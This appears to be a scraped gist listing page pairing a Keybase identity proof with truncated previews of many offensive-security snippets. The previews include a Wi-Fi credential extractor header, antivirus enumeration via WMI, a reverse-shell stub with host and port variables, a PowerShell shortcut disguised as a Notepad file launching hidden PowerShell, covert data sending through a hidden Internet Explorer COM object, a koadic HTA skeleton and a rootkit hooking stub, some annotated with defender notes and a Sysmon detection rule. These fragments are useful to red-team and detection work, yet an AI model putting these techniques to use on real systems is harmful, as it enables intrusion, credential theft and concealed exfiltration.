I hereby claim:
- I am leoloobeek on github.
- I am leoloobeek (https://keybase.io/leoloobeek) on keybase.
- I have a public key ASCyIsv1dP110VtA9CuMQ7YPLZ758Seyi8O5hu_ww7ZDVgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| #====================================# | |
| # Extract Wi-Fi Credentials # | |
| # greg . foss @ owasp . org # | |
| # v0.1 -- July, 2017 # | |
| #====================================# | |
| # Licensed under the MIT License | |
| <# |
| ' Base64Encode: returns the Base64 text form of sText. | |
| ' A temporary MSXML DOM element typed "bin.base64" does the work: the value is | |
| ' assigned through NodeTypedValue and the encoded text is read back from .Text. | |
| ' NOTE(review): with DataType "bin.base64", NodeTypedValue presumably expects binary | |
| ' data (a byte array) rather than a VBScript string; confirm what callers pass. | |
| ' NOTE(review): MSXML may insert line breaks into long Base64 output; verify | |
| ' whether the consumer needs a single line. | |
| Function Base64Encode(sText) | |
| dim DM, EL | |
| ' Late-bound COM objects: an XML DOM document and a scratch element named "tmp". | |
| Set DM = CreateObject("Microsoft.XMLDOM") | |
| Set EL = DM.createElement("tmp") | |
| ' Typing the element as bin.base64 makes .Text the Base64 rendering of the typed value. | |
| EL.DataType = "bin.base64" | |
| EL.NodeTypedValue = sText | |
| ' VBScript returns a value by assigning to the function name. | |
| Base64Encode = EL.Text | |
| End Function | |
| ' Binds to the local WMI namespace ROOT\SecurityCenter2 (impersonation-level COM security) | |
| ' and selects every AntiVirusProduct instance registered there. | |
| ' Defender note: this is a security-software inventory query (MITRE ATT&CK T1518.001 when an | |
| ' intruder runs it). Queries against this namespace from script hosts are worth baselining. | |
| Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2") | |
| Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct") |
| Option Explicit | |
| dim oEncoder, oFilesToEncode, file, sDest | |
| dim sFileOut, oFile, oEncFile, oFSO, i | |
| dim oStream, sSourceFile | |
| set oFilesToEncode = WScript.Arguments | |
| set oEncoder = CreateObject("Scripting.Encoder") | |
| For i = 0 to oFilesToEncode.Count - 1 | |
| set oFSO = CreateObject("Scripting.FileSystemObject") |
| Call X() | |
| End Function | |
| Dim RHOST: RHOST = "x.x.x.x" | |
| Dim RPORT: RPORT = "8999" | |
| Function Base64ToStream(b) | |
| Dim enc, length, ba, transform, ms | |
| Set enc = CreateObject("System.Text.ASCIIEncoding") | |
| length = enc.GetByteCount_2(b) |
| # Writes a .lnk file to the current user's Desktop through the WScript.Shell COM object. | |
| # The shortcut's target is powershell, while its icon and description are set to look like a | |
| # Notepad text document. | |
| # Defender note: a shortcut whose target is a script interpreter but whose icon and description | |
| # come from another program is a mismatch worth alerting on. Review .lnk files by parsed | |
| # target and arguments, not by how they display. | |
| $Shell = New-Object -ComObject ("WScript.Shell") | |
| $ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk") | |
| # "....." is the author's placeholder for the command. -W abbreviates -WindowStyle (1 = Hidden), | |
| # so a window-style switch in shortcut arguments is itself a useful hunting term. | |
| $ShortCut.Arguments = " -W 1 -command ....." | |
| # No path is given, so "powershell" is presumably resolved at launch time - TODO confirm. | |
| $ShortCut.TargetPath = "powershell" | |
| # Icon index 0 of notepad.exe. | |
| $ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0"; | |
| $ShortCut.Description = "Type: Text Document"; | |
| # Nothing is written to disk until Save() is called. | |
| $ShortCut.Save() |
| // sample function that takes in a destination server, POST data, and custom HTTP request headers | |
| private string SendData(string dst, byte[] postData, string customHeaders) | |
| { | |
| Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046")); | |
| object IE = Activator.CreateInstance(com_type); | |
| object[] falseArr = new object[] { false }; | |
| object[] trueArr = new object[] { true }; | |
| com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr); | |
| com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr); |
| <html> | |
| <head> | |
| <script language="JScript"> | |
| // HTA skeleton taken from https://github.com/zerosum0x0/koadic | |
| window.resizeTo(1, 1); | |
| window.moveTo(-2000, -2000); | |
| window.blur(); | |
| try | |
| { |
| <!--SYSMON EVENT ID 7 : DLL (IMAGE) LOADED BY PROCESS--> | |
| <!--DATA: UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, Hashes, Signed, Signature, SignatureStatus--> | |
| <!--Include rule: log any image load whose ImageLoaded path ends with ieproxy.dll. Presumably the aim is to surface processes other than Internet Explorer that load IE's COM proxy (confirm intent).--> | |
| <!--NOTE(review): "end with" on a bare file name matches that suffix in any directory and any longer file name ending in the same characters, so expect some unrelated hits. Sysmon gives exclude matches precedence over include matches, so loads by the Image paths in the exclude group that follows are not logged.--> | |
| <ImageLoad onmatch="include"> | |
| <ImageLoaded condition="end with">ieproxy.dll</ImageLoaded> | |
| </ImageLoad> | |
| <ImageLoad onmatch="exclude"> | |
| <Image condition="is">C:\Program Files (x86)\Internet Explorer\iexplore.exe</Image> | |
| <Image condition="is">C:\Program Files\internet explorer\iexplore.exe</Image> | |
| <Image condition="is">C:\Program Files (x86)\Internet Explorer\ielowutil.exe</Image> | |
| <Image condition="is">C:\Program Files\internet explorer\ielowutil.exe</Image> |
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |